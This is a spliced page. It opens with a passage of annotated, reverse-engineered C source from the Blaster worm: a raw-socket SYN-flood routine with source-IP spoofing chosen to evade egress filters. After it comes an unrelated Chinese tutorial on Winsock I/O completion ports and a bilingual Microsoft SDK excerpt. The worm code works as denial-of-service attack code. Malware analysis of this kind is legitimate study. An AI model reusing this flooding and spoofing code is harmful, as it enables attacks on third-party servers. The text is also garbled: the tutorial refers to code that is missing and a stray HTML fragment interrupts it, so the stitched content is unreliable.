result += (result >> 16);
result = (~result)&0xFFFF;

return (int)result;
}



/*
* This is a function that uses "raw-sockets" in order to send
* a SYNflood at the victim, which is "windowsupdate.com" in
* the case of the Blaster worm.
*/
void blaster_send_syn_packet(int target_ip, int fd)
{

struct IPHDR
{
unsigned char verlen; /*IP version & length */
unsigned char tos; /*IP type of service*/
unsigned short totallength;/*Total length*/
unsigned short id; /*Unique identifier */
unsigned short offset; /*Fragment offset field*/
unsigned char ttl; /*Time to live*/
unsigned char protocol; /*Protocol(TCP, UDP, etc.)*/
unsigned short checksum; /*IP checksum*/
unsigned int srcaddr; /*Source address*/
unsigned int dstaddr; /*Destination address*/

};
struct TCPHDR
{
unsigned short srcport;
unsigned short dstport;
unsigned int seqno;
unsigned int ackno;
unsigned char offset;
unsigned char flags;
unsigned short window;
unsigned short checksum;
unsigned short urgptr;
};
struct PSEUDO
{
unsigned int srcaddr;
unsigned int dstaddr;
unsigned char padzero;
unsigned char protocol;
unsigned short tcplength;
};
struct PSEUDOTCP
{
unsigned int srcaddr;
unsigned int dstaddr;
unsigned char padzero;
unsigned char protocol;
unsigned short tcplength;
struct TCPHDR tcphdr;
};




char spoofed_src_ip[16];
unsigned short target_port = 80; /*SYNflood web servers*/
struct sockaddr_in to;
struct PSEUDO pseudo;
char buf[60] = {0};
struct TCPHDR tcp;
struct IPHDR ip;
int source_ip;


/* Yet another randomizer-seeding */
srand(GetTickCount());

/* Generate a spoofed source address that is local to the
* current Class B subnet. This is pretty smart of Buford.
* Using just a single IP address allows defenders to turn
* it off on the firewall, whereas choosing a completely
* random IP address would get blocked by egress filters
* (because the source IP would not be in the proper range).
* Randomly choosing nearby IP addresses it probably the
* best way to evade defenses */
sprintf(spoofed_src_ip, "%i.%i.%i.%i",
local_class_a, local_class_b, rand()%255, rand()%255);
source_ip = blaster_resolve_ip(spoofed_src_ip);

/* Build the sockaddr_in structure. Normally, this is what
* the underlying TCP/IP stack uses to build the headers
* from. However, since the DoS attack creates its own
* headers, this step is largely redundent. */
to.sin_family = AF_INET;
to.sin_port = htons(target_port); /*this makes no sense */
to.sin_addr.s_addr = target_ip;

/* Create the IP header */
ip.verlen = 0x45;
ip.totallength = htons(sizeof(ip) + sizeof(tcp));
ip.id = 1;
ip.offset = 0;
ip.ttl = 128;
ip.protocol = IPPROTO_TCP;
ip.checksum = 0; /*for now, set to true value below */
ip.dstaddr = target_ip;

/* Create the TCP header */
tcp.dstport = htons(target_port);
tcp.ackno = 0;
tcp.offset = (unsigned char)(sizeof(tcp)<<4);
tcp.flags = 2; /*TCP_SYN*/
tcp.window = htons(0x4000);
tcp.urgptr = 0;
tcp.checksum = 0; /*for now, set to true value below */

/* Create pseudo header (which copies portions of the IP
* header for TCP checksum calculation).*/
pseudo.dstaddr = ip.dstaddr;
pseudo.padzero = 0;
pseudo.protocol = IPPROTO_TCP;
pseudo.tcplength = htons(sizeof(tcp));

/* Use the source adress chosen above that is close, but
* not the same, as the spreader's IP address */
ip.srcaddr = source_ip;

/* Choose a random source port in the range [1000-19999].*/
tcp.srcport = htons((unsigned short)((rand()%1000)+1000));

/* Choose a random sequence number to start the connection.
* BUG: Buford meant htonl(), not htons(), which means seqno
* will be 15-bits, not 32-bits, i.e. in the range
* [0-32767]. (the Windows rand() function only returns
* 15-bits). */
tcp.seqno = htons((unsigned short)((rand()<<16)|rand()));

pseudo.srcaddr = source_ip;

/* Calculate TCP checksum */
memcpy(buf, &pseudo, sizeof(pseudo));
memcpy(buf+sizeof(pseudo), &tcp, sizeof(tcp));
tcp.checksum = blaster_checksum(buf,
sizeof(pseudo)+sizeof(tcp));

memcpy(buf, &ip, sizeof(ip));
memcpy(buf+sizeof(ip), &tcp, sizeof(tcp));

/* I have no idea what's going on here. The assembly code
* zeroes out a bit of memory near the buffer. I don't know
* if it is trying to zero out a real variable that happens
* to be at the end of the buffer, or if it is trying to zero
* out part of the buffer itself. */
memset(buf+sizeof(ip)+sizeof(tcp), 0,
sizeof(buf)-sizeof(ip)-sizeof(tcp));

/* Major bug here: the worm writer incorrectly calculates the
* IP checksum over the entire packet. This is incorrect --
* the IP checksum is just for the IP header itself, not for
* the TCP header or data. However, Windows fixes the checksum
* anyway, so the bug doesn't appear in the actual packets
* themselves.
*/
ip.checksum = blaster_checksum(buf, sizeof(ip)+sizeof(tcp));

/* Copy the header over again. The reason for this is simply to
* copy over the checksum that was just calculated above, but
* it's easier doing this for the programmer rather than
* figuring out the exact offset where the checksum is
* located */
memcpy(buf, &ip, sizeof(ip));

/* Send the packet */
sendto(fd, buf, sizeof(ip)+sizeof(tcp), 0,
(struct sockaddr*)&to, sizeof(to));
}

“完成端口”模型是迄今为止最为复杂的一种I/O模型。然而，假若一个应用程序同时需要管理为数众多的套接字，那么采用这种模型，往往可以达到最佳的系统性能！

从本质上说，完成端口模型要求我们创建一个Win32完成端口对象，通过指定数量的线程，对重叠I/O请求进行管理，以便为已经完成的重叠I/O请求提供服务。

使用这种模型之前，首先要创建一个I/O完成端口对象，用它面向任意数量的套接字句柄，管理多个I/O请求。要做到这一点，需要调用CreateCompletionPort函数。
该函数定义如下：

最开始创建一个完成端口时，唯一感兴趣的参数便是NumberOfConcurrentThreads（并发线程的数量）；前面三个参数都会被忽略。NumberOfConcurrentThreads参数的特殊之处在于，它定义了在一个完成端口上，同时允许执行的线程数量。理想情况下，我们希望每个处理器各自负责一个线程的运行，为完成端口提供服务，避免过于频繁的线程“场景”切换。若将该参数设为0，表明系统内安装了多少个处理器，便允许同时运行多少个线程！可用下述代码创建一个I/O完成端口：

一、工作者线程与完成端口
成功创建一个完成端口后，便可开始将套接字句柄与对象关联到一起。但在关联套接字之前，首先必须创建一个或多个“工作者线程”，以便在I/O请求投递给完成端口对象后，为完成端口提供服务。在这个时候，大家或许会觉得奇怪，到底应创建多少个线程，以便为完成端口提供服务呢？这实际正是完成端口模型显得颇为“复杂”的一个方面，因为服务I/O请求所需的数量取决于应用程序的总体设计情况。在此要记住的一个重点在于，在我们调用CreateIoCompletionPort时指定的并发线程数量，与打算创建的工作者线程数量相比，它们代表的并非同一件事情。早些时候，我们曾建议大家用CreateIoCompletionPort函数为每个处理器
都指定一个线程（处理器的数量有多少，便指定多少线程）以避免由于频繁的线程“场景”交换活动，从而影响系统的整体性能。CreateIoCompletionPort函数的NumberOfConcurrentThreads参数明确指示系统：在一个完成端口上，一次只允许n个工作者线程运行。假如在完成端口上创建的工作者线程数量超出n个，那么在同一时刻，最多只允许n个线程运行。但实际上，在一段较短的时间内，系统有可能超过这个值，但很快便会把它减少至事先在CreateIoCompletionPort函数中设定的值。那么，为何实际创建的工作者线程数量有时要比CreateIoCompletionPort函数设定的多一些呢？这样做有必要吗？如先前所述，这主要取决于
应用程序的总体设计情况。假定我们的某个工作者线程调用了一个函数，比如Sleep或WaitForSingleObject，但却进入了暂停（锁定或挂起）状态，那么允许另一个线程代替它的位置。换言之，我们希望随时都能执行尽可能多的线程；当然，最大的线程数量是事先在CreateIoCompletionPort调用里设定好的。这样一来，假如事先预计到自己的线程有可能暂时处于停顿状态，那么最好能够创建比CreateIoCompletionPort的NumberOfConcurrentThreads参数的值多的线程，以便到时候充分发挥系统的潜力。一旦在完成端口上拥有足够多的工作者线程来为I/O请求提供服务，便可着手将套接字句柄同完成端口关联到一起。这要求我们在一个现有的完成端口上，调用CreateIoCompletionPort函数，同时为前三个参数——FileHandle，ExistingCompletionPort和CompletionKey——提供套接字的信息。其中， FileHandle参数指定一个要同完成端口关联在一起的套接字句柄。ExistingCompletionPort参数指定的是一个现有的完成端口。CompletionKey（完成键）参数则指定要与某个特定套接字句柄关联在一起的“单句柄数据”；在这个参数中，应用程序可保存与一个套接字对应的任意类型的信息。之所以把它叫作“单句柄数据”，是由于它只对
应着与那个套接字句柄关联在一起的数据。可将其作为指向一个数据结构的指针，来保存套接字句柄；在那个结构中，同时包含了套接字的句柄，以及与那个套接字有关的其他信息。

根据我们到目前为止学到的东西，首先来构建一个基本的应用程序框架。下面阐述了如何使用完成端口模型，来开发一个ECHO服务器应用。在这个程序中，我们基本上按下述步骤行事：

1) 创建一个完成端口。第四个参数保持为0，指定在完成端口上，每个处理器一次只允许执行一个工作者线程。
2) 判断系统内到底安装了多少个处理器。
3) 创建工作者线程，根据步骤2)得到的处理器信息，在完成端口上，为已完成的I/O请求提供服务。
4) 准备好一个监听套接字，在端口5150上监听进入的连接请求。
5) 使用accept函数，接受进入的连接请求。
6) 创建一个数据结构，用于容纳“单句柄数据”，同时在结构中存入接受的套接字句柄。
7) 调用CreateIoCompletionPort，将自accept返回的新套接字句柄同完成端口关联到一起。通过完成键（CompletionKey）参数，将单句柄数据结构传递给CreateIoCompletionPort。
8) 开始在已接受的连接上进行I/O操作。在此，我们希望通过重叠I/O机制，在新建的套接字上投递一个或多个异步WSARecv或WSASend请求。这些I/O请求完成后，一个工作者线程会为I/O请求提供服务，同时继续处理未来的I/O请求，稍后便会在步骤3 )指定的工作者例程中，体验到这一点。
9) 重复步骤5 ) ~ 8 )，直至服务器中止。

二、完成端口和重叠I/O
将套接字句柄与一个完成端口关联在一起后，便可以套接字句柄为基础，投递发送与接收请求，开始对I/O请求的处理。接下来，可开始依赖完成端口，来接收有关I/O操作完成情况的通知。从本质上说，完成端口模型利用了Win32重叠I/O机制。在这种机制中，象WSASend和WSARecv这样的Winsock API调用会立即返回。此时，需要由我们的应用程序负责在以后的某个时间，通过一个OVERLAPPED结构，来接收调用的结果。在完成端口模型中，要想做到这一点，需要使用GetQueuedCompletionStatus（获取排队完成状态）函数，让一个或多个工作者线程在完成端口上等待。该函数的定义如下：

三、单句柄数据和单I/O操作数据
一个工作者线程从GetQueuedCompletionStatus这个API调用接收到I/O完成通知后，在lpCompletionKey和lpOverlapped参数中，会包含一些必要的套接字信息。利用这些信息，可通过完成端口，继续在一个套接字上的I/O处理。通过这些参数，可获得两方面重要的套接字数据：单句柄数据，以及单I/O操作数据。其中，lpCompletionKey参数包含了“单句柄数据”，因为在一个套接字首次与完成端口关联到一起的时候，那些数据便与一个特定的套接字句柄对应起来了。这些数据正是我们在进行CreateIoCompletionPort API调用的时候，通过CompletionKey参数传递的。如早先所述，应用程序可通过该参数传递任意类型的数据。通常情况下，应用程序会将与I/O请求有关的套接字句柄保存在这里。lpOverlapped参数则包含了一个OVERLAPPED结构，在它后面跟随“单I/O操作数据”。我们的工作者线程处理一个完成数据包时（将数据原封不动打转回去，接受连接，投递另一个线程，等等），这些信息是它必须要知道的。单I/O操作数据可以是追加到一个OVERLAPPED结构末尾的、任意数量的字节。假如一个函数要求用到一个OVERLAPPED结构，我们便必须将这样的一个结构传递进去，以满足它的要求。要想做到这一点，一个简单的方法是定义一个结构，然后将OVERLAPPED结构作为新结构的第一个元素使用。举个例子来说，可定义下述数据结构，实现对单I/O操作数据的管理：

最后要注意的一处细节是如何正确地关闭I/O完成端口—特别是同时运行了一个或多个线程，在几个不同的套接字上执行I/O操作的时候。要避免的一个重要问题是在进行重叠I/O操作的同时，强行释放一个OVERLAPPED结构。要想避免出现这种情况，最好的办法是针对每个套接字句柄，调用closesocket函数，任何尚未进行的重叠I/O操作都会完成。一旦所有套接字句柄都已关闭，便需在完成端口上，终止所有工作者线程的运行。要想做到这一点， 需要使用PostQueuedCompletionStatus函数，向每个工作者线程都发送一个特殊的完成数据包。该函数会指示每个线程都“立即结束并退出”。下面是PostQueuedCompletionStatus函数的定义：

其中，CompletionPort参数指定想向其发送一个完成数据包的完成端口对象。而就dwNumberOfBytesTransferred、dwCompletionKey和lpOverlapped这三个参数来说，每一个都允许我们指定一个值，直接传递给GetQueuedCompletionStatus函数中对应的参数。这样一来，一个工作者线程收到传递过来的三个GetQueuedCompletionStatus函数参数后，便可根据由这三个参数的某一个设置的特殊值，决定何时应该退出。例如，可用dwCompletionPort参数传递0值，而一个工作者线程会将其解释成中止指令。一旦所有工作者线程都已关闭，便可使用CloseHandle函数，关闭完成端口，最终安全退出程序。

注：CreateIoCompletionPort ，PostQueuedCompletionStatus ，GetQueuedCompletionStatus 等函数的用法说明。

Platform SDK: Storage

I/O Completion Ports

I/O completion ports are the mechanism by which an application uses a pool of threads that was created when the application was started to process asynchronous I/O requests. These threads are created for the sole purpose of processing I/O requests. Applications that process many concurrent asynchronous I/O requests can do so more quickly and efficiently by using I/O completion ports than by using creating threads at the time of the I/O request.

I/O完成端口(s)是一种机制，通过这个机制，应用程序在启动时会首先创建一个线程池，然后该应用程序使用线程池处理异步I/O请求。这些线程被创建的唯一目的就是用于处理I/O请求。对于处理大量并发异步I/O请求的应用程序来说，相比于在I/O请求发生时创建线程来说，使用完成端口(s)它就可以做的更快且更有效率。

The CreateIoCompletionPort function associates an I/O completion port with one or more file handles. When an asynchronous I/O operation started on a file handle associated with a completion port is completed, an I/O completion packet is queued to the port. This can be used to combine the synchronization point for multiple file handles into a single object.

CreateIoCompletionPort函数会使一个I/O完成端口与一个或多个文件句柄发生关联。当与一个完成端口相关的文件句柄上启动的异步I/O操作完成时，一个I/O完成包就会进入到该完成端口的队列中。对于多个文件句柄来说，就可以把这些多个文件句柄合并成一个单独的对象，这个可以被用来结合同步点？

A thread uses the GetQueuedCompletionStatus function to wait for a completion packet to be queued to the completion port, rather than waiting directly for the asynchronous I/O to complete. Threads that block their execution on a completion port are released in last-in-first-out (LIFO) order. This means that when a completion packet is queued to the completion port, the system releases the last thread to block its execution on the port.

调用GetQueuedCompletionStatus函数，某个线程就会等待一个完成包进入到完成端口的队列中，而不是直接等待异步I/O请求完成。线程（们）就会阻塞于它们的运行在完成端口（按照后进先出队列顺序的被释放）。这就意味着当一个完成包进入到完成端口的队列中时，系统会释放最近被阻塞在该完成端口的线程。

When a thread calls GetQueuedCompletionStatus, it is associated with the specified completion port until it exits, specifies a different completion port, or frees the completion port. A thread can be associated with at most one completion port.

调用GetQueuedCompletionStatus，线程就会将会与某个指定的完成端口建立联系，一直延续其该线程的存在周期，或被指定了不同的完成端口，或者释放了与完成端口的联系。一个线程只能与最多不超过一个的完成端口发生联系。

The most important property of a completion port is the concurrency value. The concurrency value of a completion port is specified when the completion port is created. This value limits the number of runnable threads associated with the completion port. When the total number of runnable threads associated with the completion port reaches the concurrency value, the system blocks the execution of any subsequent threads that specify the completion port until the number of runnable threads associated with the completion port drops below the concurrency value. The most efficient scenario occurs when there are completion packets waiting in the queue, but no waits can be satisfied because the port has reached its concurrency limit. In this case, when a running thread calls GetQueuedCompletionStatus, it will immediately pick up the queued completion packet. No context switches will occur, because the running thread is continually picking up completion packets and the other threads are unable to run.

完成端口最重要的特性就是并发量。完成端口的并发量可以在创建该完成端口时指定。该并发量限制了与该完成端口相关联的可运行线程的数目。当与该完成端口相关联的可运行线程的总数目达到了该并发量，系统就会阻塞任何与该完成端口相关联的后续线程的执行，直到与该完成端口相关联的可运行线程数目下降到小于该并发量为止。最有效的假想是发生在有完成包在队列中等待，而没有等待被满足，因为此时完成端口达到了其并发量的极限。此时，一个正在运行中的线程调用GetQueuedCompletionStatus时，它就会立刻从队列中取走该完成包。这样就不存在着环境的切换，因为该处于运行中的线程就会连续不断地从队列中取走完成包，而其他的线程就不能运行了。

span lang="EN-US" style="FONT-SIZE: 15pt; FONT-FAMILY: 宋体; mso-bidi-font-size: 12.0pt">The best value to pick for the concurrency value is the number of CPUs on the machine. If your transaction required a lengthy computation, a larger concurrency value will allow more threads to run. Each transaction will take longer to complete, but more transactions will be processed at the same time. It is easy to experiment with the concurrency value to achieve the best effect for your application.

对于并发量最好的挑选值就是您计算机中cpu的数目。如果您的事务处理需要一个漫长的计算时间，一个比较大的并发量可以允许更多线程来运行。虽然完成每个事务处理需要花费更长的时间，但更多的事务可以同时被处理。对于应用程序来说，很容易通过测试并发量来获得最好的效果。

The PostQueuedCompletionStatus function allows an application to queue its own special-purpose I/O completion packets to the completion port without starting an asynchronous I/O operation. This is useful for notifying worker threads of external events.

PostQueuedCompletionStatus函数允许应用程序可以针对自定义的专用I/O完成包进行排队，而无需启动一个异步I/O操作。这点对于通知外部事件的工作者线程来说很有用。

The completion port is freed when there are no more references to it. The completion port handle and every file handle associated with the completion port reference the completion port. All the handles must be closed to free the completion port. To close the port handle, call the CloseHandle function.

在没有更多的引用针对某个完成端口时，需要释放该完成端口。该完成端口句柄以及与该完成端口相关联的所有文件句柄都需要被释放。调用CloseHandle可以释放完成端口的句柄。